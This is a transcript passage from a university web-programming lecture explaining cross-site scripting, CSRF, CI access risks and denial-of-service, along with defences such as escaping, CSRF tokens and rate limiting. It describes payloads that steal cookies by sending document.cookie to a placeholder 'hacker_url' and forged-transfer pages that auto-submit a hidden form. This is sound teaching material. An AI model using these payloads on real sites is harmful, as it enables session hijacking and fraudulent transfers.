not have seen this before, but Flask has built in error handlers that are specific functions that run when specific error codes happen. So 404, you might recall, is the error code for not found when someone goes to a page that doesn't exist on the web server. And what Flask can do for you is say whenever a 404 error happens on the web server, go ahead and run this function, which is going to supposedly render my 404 error page. And you can do the same thing for error 500, for example, internal server errors, or 403, forbidden errors, or any other errors status code you want. If you want particular code to run, a particular template to be displayed when a particular error code happens on your web application, you can use a Flask's built in error handler to be able to handle those particular situations. So what we have here is a function that is supposed to handle 404 errors, that handles a page not found error. It calls this page not found function, and all the page not found function is going to do is say return not found. And then it's going to append request.path, where request.path is what the URL was that the user tried to go to that resulted in the 404 error. And so what might that mean? It means that if a user goes to /foo, for example, then what's going to happen is-- I'll go ahead and go into cross-site scripting zero and go ahead and run this web application, running that very same code. So I get hello, world when I go to the default route, don't type in anything after the URL. But if I go to /foo for example, what do I expect to see? AUDIENCE: Error not found. BRIAN YU: Great. Not Found: foo, because not found was the initial message that happens when I do a 404 error message. And then /foo is the path, the request path that I tried to request. And so this might be pretty typical. That if I go to a URL that doesn't exist, I probably expect a page like this to show up that says, sorry, this route, this path that you were trying to request, couldn't be found on the web server. So what can go wrong there? Here's the web application, where's the security vulnerability? Yeah? AUDIENCE: So someone maybe could somehow inject a script path into your request path location. BRIAN YU: Great, exactly. So the vulnerability is with this request path. That if someone is able to inject JavaScript code into this request path, now suddenly, the thing that I'm returning is not found colon, potentially some JavaScript code that is then going to be run. And you might imagine that if a hacker now is able to take one of these URLs and convince a user to click on a link that takes them to a URL like that, that takes them to this particular function in my Flask application, now suddenly this hacker is able to run whatever JavaScript code they want to inside of the web application. So what might that look like? Instead of just going to /foo as the route that returns a benign not found /foo on the page, what if, for instance, the user typed in this as their URL? Where after the slash, they type script alert hi /script, end JavaScript. Now this is going to be the request path, which means what gets put into return not found colon, we're going to return some page that says not found and then this JavaScript code. This JavaScript code that says alert, hi. So this is code now that if someone clicks on, might potentially be executed by this web browser, an example of cross-site scripting. That someone is able to send me this link, and they were able to inject random JavaScript, whatever they want, into this particular application. So let's try it. So again, going to /foo, says Not Found, foo. If I do a /bar, it says Not Found bar. What's going to happen if I do script alert hi /script? So here's my URL now. Rather than type in foo or bar, I've added to this JavaScript code to the URL and I'm going to try and run that. What's going to happen? AUDIENCE: An alert. AUDIENCE: Get an alert. BRIAN YU: We'll get an alert. That's what we expect to happen, at least. In fact, Chrome is getting pretty good at this. Chrome and other web browsers have built-in security features. So Chrome actually stopped me. It gave me this page that says, this page isn't working. Chrome detected unusual code on this page and blocked it to protect your personal information, for example, passwords, phone numbers, and credit cards. And if we look down here, it says error, blocked by XSS, or cross-site scripting, error blocked by cross-site scripting auditor. So Chrome's got some built-in feature here that's checking for potential cross-site scripting, like what we just tried to do, and it's blocking me from getting access to this page. And this defends against certainly some kinds of cross-site scripting, but not all. And we'll see an example of one which bypasses Chrome in just a moment. And certainly you can't rely on all web browsers to be able to have this built-in cross-site scripting auditor built in, so these are definitely still things to be careful about. So what would happen if this auditor didn't exist, if it wasn't in place? We can actually find out. That Chrome actually lets us, if I run Chrome from the command line and run Chrome dash, dash, disable xss auditor, I can run Chrome without running the cross-site scripting auditor. Just turn that auditor off. And now if I go here, slash script alert high, just like I did before, and press Return, now I get the alert that says hi. I've injected JavaScript code into this page, and after I press OK, now it says not found, slash. And of course that seemed relatively benign, that an alert certainly showed up. JavaScript code was running, but nothing was really compromised. So where might this go wrong? Where could this really become a problem? Can anyone think of why this might really start to become an issue? Injecting arbitrary JavaScript code. Yeah? AUDIENCE: An executable could be put in there. BRIAN YU: Great. Any executable thing could be put into this JavaScript code so that any code could run. And in particular, that means that anything could happen on the web browser, including potentially secure information being exposed. And so in the case of Flask and when we talked about logging in and logging out, we've talked about this a little bit, how does the browser know-- or when the server is-- when someone logs into a website and the server says, OK, this user is now logged in. When I go and click on another button, how does the browser or the server still know that I'm the one logged into the website? AUDIENCE: Session. BRIAN YU: The session, certainly. And how does that-- or what do we know from the-- what's happening on the client side? How does it know that it's coming from the same place? That it's the same user that's making that request? AUDIENCE: It's in a cookie. BRIAN YU: Inside of a cookie, yes. So that we've got some cookie, some information, stored in our computer. That is the cookie that tells the server-- it's like a hand stamp that says, yes, this is me. Show me the same page that I was looking at before. I'm still logged in. And we talked about if someone were ever to get access to that cookie, then they would be able to login as us. They could pretend to be us and therefore use our credentials, and the server wouldn't be able to tell the difference because that cookie is a valid cookie, for instance. And so let's take a look at now, if it wasn't this script that was being passed into the application, but this script. Slightly different, slightly more complicated. We've got /script, so we're starting JavaScript. We say document.write, which is just a way of writing new information, new text, into the HTML content of the page, and we're adding an image, which seems sort of strange. Image source equals hacker URL, where hacker URL is some URL of some hacker's website. And cookie equals, and then we added document.cookie, which is going to represent the cookie for this particular web browser, this particular page. And then end angled bracket, and that's the end of the JavaScript. We effectively just added an image tag into the page where the source of that image is supposedly hacker_url?cookie=document.cookie. Why is that a problem? What's just happened here? Yeah? AUDIENCE: You're going to hit the hacker's website and pass your cookie as a [INAUDIBLE]. BRIAN YU: Exactly. We're going to hit the hacker's website, and any time we're making a request to that server, that server is potentially logging exactly what URL was requested. In fact, if you've been using Flask or Django all this time and you've looked at the terminal window, you've probably noticed over here that you've been able to see every single request that's been made. Here was a GET request to the URL slash, here's a GET request to the URL /foo, here's a GET request to the URL /bar. And so if our hacker is carefully monitoring all of the requests to the server over here at hacker URL, they're going to notice something like someone made a request to hacker_url?cookie= and then some cookie, right? So by injecting this JavaScript code into the user's web browser and having this run, they've added this image tag that's going to make a request to hacker_url and is going to pass this information, that cookie-- so now the cookie that was originally on your computer, someone else now has access to because you've now just put it inside of some request that's going elsewhere. And that's why Chrome was giving us that error, that warning message about, well, be careful. We tried to block you from being able to see this page because it looks like someone might be able to inject JavaScript code that might be able to steal your passwords or other information. Because any information, we can just send in a request to some other URL, in this case. And so this is really the danger of cross-site scripting, this ability to inject JavaScript into any arbitrary page. Questions about any of that? AUDIENCE: Question. BRIAN YU: Great. Yeah? AUDIENCE: What did they do with cookie? I mean-- BRIAN YU: Good question. What can we do with the cookie? So once you have the cookie, you could potentially use that to login as someone else, for instance. Or any secure information that's stored in that cookie, you'd have access to. So if there are secure pieces of data stored in the cookie, then that's potentially a vulnerability. And we talked about in last lecture, I believe, how Flask gives you the option of, if you want to, storing all of your session information inside of a cookie. Which means secure information about the contents of your shopping cart or how much money you have in your account might be stored inside of that cookie, which could potentially be a vulnerability. But even if that's not there, at minimum, that cookie is a way of convincing the server that someone else is who you are. If they steal your cookie, they can convince the server that they are you. And then they can have access to your account on whatever web application this is and potentially do whatever they want with that information. AUDIENCE: Would that be time bound with the-- like with that session, that you'd have to use it for the next session? BRIAN YU: Good question. Would it be time bounded? It quite possibly could be. That if I were to log out for instance and now the server forgets about that cookie, now suddenly we've been able to avert this scenario, or this is no longer going to be a valid way. But if they can convince me to click on the URL again the next time I log into the site, now it suddenly becomes a problem all over again. And so we'll want to think carefully about, when we're using JavaScript inside of our web applications, is there a place where we might be vulnerable. In fact, our original web application didn't even have any JavaScript in it at all. It was really just Flask and returning text. But still, a malicious hacker was able to inject JavaScript into our page just because we were including that raw JavaScript in there as well. So these are certainly things to be mindful of. And both Flask and Django have ways of making sure that when you're inserting information, it's inserted in a safe way such that we escape any potential JavaScript characters to help avoid these types of situations. But these are just good things to be mindful of and be careful about as we go about designing these web applications. Let's go ahead and take another look at another example of cross-site scripting and how it can happen. What I will look at now is a slightly more complicated site, and this is one that Chrome is actually not going to be able to fully defend against. And what cross-site scripting one is is it's a web application that is going to display a message list. It's sort of a message board. We saw a brief example of something that looked very similar to this when we were first taking a look at Flask and how we're able to render templates and such. This one actually uses a database. And I'll show you what it looks like. We'll look at application.py. So I have a SQLite database that I'm going to be using that's just going to store a whole bunch of messages so that it can be on this public message board. And effectively, I have just one route, a default index route, where if I'm just viewing this page by a GET request, just asking to see the page, I skip over this post stuff, and I just get all the messages. Selecting star from messages, just get all the messages in the message board. And then go ahead and render this template, index.html passing in those messages. And then, if it's a post request, then I'm going to get whatever the contents of the message that I'm trying to add is, whatever came in through this form, and then I'm going to insert into my messages table, whatever that content is. So if I type in a new message and insert it, I submit that via a post request. It gets added to my list of growing messages. And otherwise, if I'm just requesting the page normally, or even after something is done being inserted, I'm going to request for all the messages by selecting it all from the database and then rendering it inside of index.html. So what does that look like? The result is that using just these couple of lines of code, I now have this Message List site where I can type in foo as a message, submit that. And now the message foo is there, bar goes in there, and this gets added to the public message board. And of course, if I were to close this site and I were to open it again or someone else were to open it again on their computer, because it's all drawing from the same database, now I go back here again. Foo and bar are still there, so those messages are still there. And so where is the opportunity for cross-site scripting attacks here? AUDIENCE: You could store a script in the database. BRIAN YU: Exactly. We could store a script in the database, a script could be one of the messages. Such that that JavaScript code gets just inserted into the HTML contents of this page here, and then it could potentially run. So if I were to add a message that was like, script alert hi /script, and then submit that, well, what seems to happen here is that when I try and submit it, Chrome is giving me some error. It's giving me that same error as before, this page isn't working. Chrome detected unusual code. Here's that cross-site scripting auditor saying, hey, wait a minute, something's wrong. And the reason it was able to do that is because when I was submitting my request, there was some JavaScript included inside that request. So Chrome was able to detect that something might be a little fishy there, that I was submitting this JavaScript along with the request, and then it was coming back to me. So what about if I were to close the page and open it again. Now I'm just requesting the page. There's no JavaScript in the URL, and all that's happening is that it's extracting information from the database and displaying it onto the page. And so Chrome now has no real way of knowing that there is any potential cross-site scripting involved. So I go here, and now I get the hi alert. They were able to run arbitrary JavaScript on this page. And then I see foo and bar and then just some empty thing because that's where the JavaScript code was before. It's like here's an example of us being able to add a cross-site scripting vulnerability that we were able to take advantage of, exploit, by just adding JavaScript code into here as well. And so I haven't been committing these changes to the database. I haven't been saving them. So if I run this again, we'll be reset back to a clean slate. So if I go back here, I see a blank message list again. So what are some other things that I could potentially do? Well, I might be able to say someone does foo and then bar. Maybe I could say-- I just want to display whatever contents I want. So I'm going to add JavaScript that says document.body.innerH TML=whateverpageIwant/script, and I submit that. Again, Chrome blocks it the first time because it detects that, with this request at least, there was something fishy going along. But when the next request comes in, when the next person comes along, they open this page, now message list is gone. I don't see foo and bar or any of those other messages. I just see whatever the contents of the page that I wanted to show was. And that gets displayed to the user here. So that's certainly one thing they could do. Certainly stealing cookies is another thing that could happen in the same way that we saw it in the last example. Or someone could say, you know what? Let's just take the user to an entirely different site. Let's take them to my site where I can now try and steal information from them as well by saying window.location equals, and I can say cs50.github.io/web. And so now this window.location equals some URL is the JavaScript code that I'm running. I'll submit that. And when the next user comes along and they try and go to my page, now they're suddenly redirected. I've taken them somewhere else entirely. And if that other new page looks sort of similar to the old page, they might be tricked into thinking it is the same old page. And they might be interacting with it, typing in their credentials, usernames, and passwords, and now this hacker is able to gain access to that as well. And so how do we defend against these sorts of cross-site scripting vulnerabilities? Well, Flask is actually pretty good about this. And by default, when you're rendering a template, like render template, and you're plugging in some information, Flask will, by default, automatically escape that stuff for you. It will say, you know what? This is stuff that could potentially be JavaScript or could potentially be unsafe, so we'll go ahead and escape it and protect that information for you. Certainly not all frameworks are like that, and certainly if you're just doing string concatenation like we were in the previous example, then that's not something we can really rely on. But if we take a look at templates index.HTML, in order for this to really work the way that I wanted it to, I had to add this bar safe in here, where this is my way of telling Jinja2, the template rendering engine, don't worry about escaping anything. Just display the contents. And so in reality, if you were to just do message.content, Flask would be smart enough to try and defend against this for you. But it is something that you just want to be careful about anytime you have text that you think is safe, is it really safe? Is there a potential for JavaScript code to be injected into there? And if you're generating the templates yourself by string concatenation like we were in the previous example, is there an opportunity for cross-site scripting to appear there as well? And so that's certainly one of the major vulnerabilities that can come about as we start to deal with JavaScript and using JavaScript inside of our web applications. Questions about that? All right. Let's move on and take a look at the next web framework that we talked about, which in particular was Django. And so when we first took a look at Django, we looked at how we would go about doing the same things we did in Flask, about rendering templates and displaying pages and using server side logic to handle requests. And in particular, we looked at forms. And when we did look at forms, I had to add a line to one of the forums that seemed a little bit strange. Does anyone remember what that line was? Yes? AUDIENCE: CSRF token. BRIAN YU: Yeah, we added the CSRF token line to it. And I said don't worry about that for now, we'll talk about it later. And now is that time that we're going to start talking about it. CSRF stands for Cross-Site Request Forgery. And this is yet another type of attack that people can use where Cross-Site Request Forgery is the idea of trying to forge a request to some other website in order to take some action that the user might already be logged into. And so what might be an example of that? Let's say, for instance, that someone was logged into their bank, on their bank's website. And I, on some other website, wanted to try and trick the user into transferring some money to me, for instance. How might I to go about doing that? Well, you might imagine very simply that I might start by creating a website, my own website, that looks something like this. I have the body of my website, I have an a href, a link. And this link goes to HTTP:yourbank.com/transfer, and then some arguments, some GET parameters, transfer to Brian, amount, 2,800, for instance. And if the bank is set up in this such way, where making a GET request to /transfer by passing in as arguments who you're transferring to and what the amount is initiates a transfer, now I've been able to create a sort of security vulnerability. That if this is what's displayed on my page and I can convince someone to click here, so long as they're already logged in to yourbank.com, then clicking on that link automatically will initiate that transfer. So if yourbank.com is set up in that way, such that transferring money just happens via this GET request, then that's certainly a way that I could trick someone into transferring money to me. What are some ways to protect against that? What can yourbank.com do to make sure that we can't do something like this? Such that someone else can't just add a link that says click here and then automatically initiate the transfer of money. Yeah? AUDIENCE: When you're doing an operation like this, you want to send some token with it so it knows that it was you that's doing it, and you're not being played. BRIAN YU: Great, some token. And certainly, we'll see more about that when we get to some more details. But right now, this is just a link that you're clicking on. So we're just clicking on a link. And what else could the bank do? But that's certainly one good answer. AUDIENCE: Not expose a service with a GET request like that. BRIAN YU: Great. Not expose a GET request like this. That could certainly be something. And in fact, this is something that's generally good web practice. That you don't want GET requests to be modifying the state of something, like modifying who has what amounts of money. That generally, all of that should be inside of a POST request, such that it really needs to be a form submission that needs to happen in order to allow that to happen. And of course, maybe this isn't such a big deal because I'm saying, click here. And so as long as the user is smart and as long as they're careful and they hover over the link and see, oh, this is going to take me to yourbank.com/transfer, then I'm safe. So how might a hacker get around that? In order to make it such that the user doesn't need to click on, click here, in order to initiate that transfer? AUDIENCE: They don't need [INAUDIBLE] in other website. BRIAN YU: Great. So hypothetically, we could just add some JavaScript code here that says that rather than a link that someone needs to click on, we'll just add some JavaScript code that will automatically redirect the user there, for instance. And that could be something that could happen as well. But then at minimum, the user is taken to that other web site, and now they can see that that transfer has happened. But there are even more subtle ways about doing this as well. We looked at, in a couple of slides ago, we talked about how image tags, for instance, can be used. Where if you provide the link to whatever the source of the image is, that will automatically trigger a request there as well. And so you might imagine that instead of structuring my hacking page like this, if I tried this as my exploit instead, just render an image where the source of that image is yourbank.com/transfer and here's what I'm transferring. Now, no need for a user to click on any link at all. As soon as they go to my page, your web browser is going to make a request to this URL, and that's going to potentially start to initiate a transfer. And so that's certainly a potential security vulnerability. And so someone suggested OK, well, rather than make your bank take all of its transfers via GET requests, we might instead want to do this via making it a form that someone needs to submit, some POST request. That it can't just be you clicking on a link or you rendering some image that's going to trigger the transfer of funds. So maybe you might imagine that I could do something like this. This might be an exploit that I can use now on my site. That I create a form whose action is yourbank.com/transfer, the method is POST, and now I have these hidden input type, input type equals hidden. This is an input type that's just not going to appear to the user. The user is not going to see this at all. It's an input type named to, whose value is who I want to transfer the money to. I have an input type that is the amount, which is the amount of money that I want to transfer. And then I have an input type called submit, which is just going to be a button that says click here. And so all the user is going to see, if this code is rendered, is what? What does the user see? AUDIENCE: Click here. BRIAN YU: Exactly. They just see this one input field, this button that says click here, because these two input fields are hidden. And of course, click here could say anything. It could say next page, for instance. Something benign that looks like something you might reasonably just click that would take you somewhere else, when in reality, it's submitting a form that's going to transfer funds to someone and to some amount. But of course, maybe we're OK because if the user is careful and they're not going to click on the button, then-- and then if they're not clicking on a button when they don't know what that button actually does, then they're safe, how might a hackers still get around this and still be able to get the user to submit this form? Even without the user clicking on a button. Yeah? AUDIENCE: Can you do a POST request from JavaScript code? BRIAN YU: Can you do a POST request from JavaScript code? Certainly you can. We actually looked at ways we could do that before when we were talking about AJAX and making requests to a server in order to get more information from the server after we've already loaded the page. So that's certainly one option as well. Another way we could do it is just by adding this additional line to the body, on load-- when you're done loading-- here's what the body should do. Document.form0, get the first form in the document and submit it. Just by adding that single line of JavaScript code, now as soon as the user loads this page, this form will be submitted, and then that will initiate the transfer at yourbank.com So certainly, this isn't a good scenario we want to be in. This is CSRF, Cross-Site Request Forgery, where we are able to create a request to some other site and pretend that request was originally from yourbank.com in order to initiate the transfer. And so long as I know what parameters that request takes, I'm able to forge that request. And so the solution, as was pointed out, which is what Django uses and a bunch of other web frameworks use, is to add a special token, effectively a password. Where the idea is that you would write this inside of your Django code, and if you were to look at the HTML that gets rendered as a result, what's actually happening is that in place of CSRF token, the web server, the Django web server, is inserting some long string, some effectively a token or a password, that is associated with this specific form. Such that when the user submits that form, the token is submitted along with it. And the server can then check to see does this token match the token that I initially sent out. And only, if and only if they match, then we're going to actually initiate the transfer. That way, no other website is able to forge a request to my bank's transfer web site because they're not going to know what the token is. It's going to be a new token every time we make a request, and that's going to allow us to avoid a situation where someone might be able to-- from some other site-- make a request that attacks the /transfer route in this case. So that's why Django has that CSRF token in place. It's to prevent against those kinds of attacks. Flask on its own doesn't, by default, have this sort of protection built in, although there are extensions that allow you to add on to a Flask in order to help add security for this particular type of attack into Flask as well. So these are also just good things to be aware of, potential security vulnerabilities that can exist, and things you'll want to think about as you design your application. Can just anyone initiate a transfer request by submitting a POST request or do they need some special tokens, potentially changing, as they go about doing that as well. Questions about the security vulnerabilities we've talked about so far? OK. Let's go ahead and move on from Django and talk a little bit about CI/CD. And so this is relatively recent, where we were talking about how we might leverage CI tools, where we looked at Travis in particular, as a tool that we can use in order to run tests in order to deploy our code. And we connected Travis to GitHub, whereby Travis was able to run tests on our GitHub code inside of our repositories and then check to make sure that those tests, in fact, passed. What vulnerabilities appear there? Or are things that we should be considering when we start to think about that? Yeah? AUDIENCE: You're giving Travis access to your codebase. BRIAN YU: Yeah, exactly. We're now giving Travis access to our codebase. So whereas before, our code was stored on GitHub and GitHub alone, such that, certainly, if GitHub was compromised, now our code is compromised as well. Now we've given Travis access to all of our private repositories on GitHub potentially, such that now there are two points at which being compromised could result in our code being compromised. Whereby if GitHub is compromised, our code is compromised. But likewise, if Travis is compromised for some security reason, then our code might also be compromised because Travis has access to our GitHub account. And so any time you deal with accounts that are able to grant permission to other applications or other accounts to get access to that information, that's where there's potentially room for security vulnerabilities. And so we see that with GitHub, where GitHub is allowed to authorize other applications if you give them permission to have access to your information as well. But you see this in other websites as well. In fact, Facebook does this, and been under controversy recently, for the idea that it can grant third party applications the right to look at your user information. And if you grant a third party application that right, now if any one of those is compromised, then your own user information is compromised. And so it's the same type of thing, where you want to be careful about if you're giving access to one website, giving one website access to your user information or your code and your repositories, then what other services also have the same access to that information as well. And so if you're the one designing the services, you want to be careful about what other services you give access to. And if you're the one using GitHub or Travis, you also want to be careful about how many different third party services have access to all of your private repositories for example. And so as a final example, as we move on to, just recently last week, in terms of the topics we were talking about, we talked a little bit about scalability and the idea that once we've written our application and we're ready to deploy it, we need to think about how we're going to scale this application as more and more users start working about it. We talked about load balancers and having multiple, different servers. And we talked about, in particular, that any server is a finite machine that can only handle a certain number of requests in a certain amount of time. Maybe x requests per second for instance, where x is some number. And what potential vulnerabilities or exploits come about there? What could a potentially malicious hacker try to do knowing the constraints of what our systems are capable of? AUDIENCE: Like [INAUDIBLE] can start DDoSing your system, sending a bunch of requests at the same time. BRIAN YU: Exactly. Sending a bunch of requests. So if a computer, for instance, is going to-- if our server, for instance, can only handle 1,000 requests per second, and one hacker, on their computer, decides that they want to try and shut down our system-- maybe they're going to send 1,001 request in a single second to our server. And this is what we'll generally call a DoS, or denial-of-service attack, where a user tries to send a request after request after request in an attempt to overload our servers in order to try and make sure that we're unable to handle all the requests that are coming in. And if we're handling all of the requests coming in from one user, then we're potentially not able to handle requests coming from other people as well. Of course, this probably isn't too much of an issue if we've got dozens and dozens of servers and only one computer is the one making a lot of requests. Which is why the next thing you mentioned was also a potential exploit or a potential concern, which is that what if it's not just one, single computer, but a whole botnet of a bunch of computers that are all trying to make requests to the same web server at the same time? This is what we generally call a DDoS attack, a Distributed denial-of-service attack, where we have a lot of different computers that are all trying to make requests at the same time to our same web application. And as a result, it's quite likely that the web application might be overloaded by all these requests and be unable to handle it. And so what are ways of potentially dealing with a DDoS attack? Of a bunch of people trying to make requests at the same time, trying to shut down our server by overloading it with too many requests? Yeah. AUDIENCE: Limit how many requests they can make. BRIAN YU: Try and limit how many requests they can make. So certainly one potential approach to dealing with DDoS attacks is to try and add some sort of filtering system of trying to-- before it actually gets to the server, try and filter and see is this a valid request or not? And maybe there are heuristics you can use for that. And certainly, if you can limit people, that if you notice that this particular computer is making a lot of requests at the same time or in a short amount of time, then maybe you can put downward pressure on that by blacklisting that particular user. So that's certainly something we could think about as well. But in the end of things, it really often does come down to just a battle of resources, of who has more resources. Is it the adversary or is it yourself? And so oftentimes this is not something that you can just deal with at the web application level, but it's something that needs to be dealt with at the server level or the ISP level. Where you really need to make sure that your infrastructure is in place, especially if you're dealing with a large web application, to make sure that you're able to handle all of that potential traffic. And so certainly, the end idea of this and of all the topics we've talked about so far today is that through all of the things we've talked about, whether it was just a simple, static HTML web page or dealing with scalability and Flask and Django and other web services, or JavaScript and how we might be able to inject JavaScript code into our web application, there are security vulnerabilities everywhere. And it's definitely a good idea to be thinking about what those vulnerabilities might be and how we might be able to deal with them when they arrive. And so now let's think about moving beyond just this course as we arrive at the conclusion of the course. What comes next? If this is still something that interests you, if web programming is something that you're interested in continuing to learn more about, we were just really barely scratching the surface here when it came to programming with Python and JavaScript. We looked at Flask and Django in particular as the web frameworks that we were using in order to build and design and deploy our websites. But those certainly are not the only options. There are other web frameworks that are gaining popularity in modern times, nowadays, that are definitely worth looking into if this is the sort of thing that interests you. Generally, we can divide them into server-side frameworks, the sort of frameworks that are going to be running like Flask or Django on our web server somewhere, where Express.js and Ruby on Rails are examples of some server-side frameworks that we'll commonly use. Actually, sorry. This is mislocated a little bit. And client-side frameworks include things like React or Angular that are common frameworks that are used on the client-side now, in order to generate components that are displayed that are able to interact with the web server in some way. And so these are definitely things to look at as well. And then when it comes to actually taking your web application and deploying it to the internet, if that's something that's of interest to you as well, there are a whole number of other services that you can use as well for that. So GitHub Pages was one that we looked at way at the very beginning of the course, which is generally used if we just want to deploy some static content to a page like HTML and CSS and JavaScript. And that's totally fine for GitHub Pages. But if we want to run a web server, we're going to need a little bit more than that. And so we did look a little bit at Heroku when we were thinking about using our database. So Heroku is a service that allows us to host web applications on the internet. It makes it relatively easy to take a Flask or Django web application and host it. And in particular, it makes it very easy to hook that up to a database, for instance, in order to connect it with a PostgreSQL database, as we did in one of the early projects in order to allow us to deploy that as well. But if you're looking for even more power and even more feature-filled web hosting than that, you can take a look at Amazon Web Services or Google Cloud or Microsoft Azure, all of which offer a lot of different services for taking web applications and deploying them to the internet. They often will use Docker, which we looked at a little while back when we were talking about containerizing our application and bundling together our web application with the database and any other services that might be involved in running that application. And so certainly these are services that you can use as well if you're thinking about actually building out one of these web applications and deploying it to the internet. And these larger services like AWS or Microsoft Azure, they have the ability to take care of some of the scalability concerns that we were talking about. The ability to add load balancers that are able to make sure that we have enough servers to make sure that we're able to handle all the requests coming in from all the different users. And they do auto scaling such that as more users come in, we can increase the number of servers or decrease the number of servers as well. And so these are increasingly popular tools and technologies that are ways of allowing people to take web applications that they're building on their own computers and ultimately deploy them to the internet. Before we wrap up, I just want to make sure to say thank you to all the people that were really instrumental in making the course possible. To David, my co-instructor, who unfortunately couldn't be here today. But also to our great teaching fellows, Anushree and Elle and Rodrigo and Sebastian and Jessica for running the course's office hours in the course's sections. And of course, the CS50's production team, Ramon and Andrew and Max and Meredith and Ian and Scully and Dan and Arturo for making the lectures possible and the lecture videos possible. Thank you to you all. And of course, finally, thank you to all of you for joining us in this course, for learning about web programming with Python and JavaScript. Hope you enjoyed it. Hope you got an opportunity to work on some hands-on projects that were exciting and ultimately showed you the power and capacity that Python and JavaScript have for building really dynamic and really interesting web applications. Can't wait to see what you guys continue to do with your final projects. But that's it for web programming with Python and JavaScript, so thank you all so much. [APPLAUSE]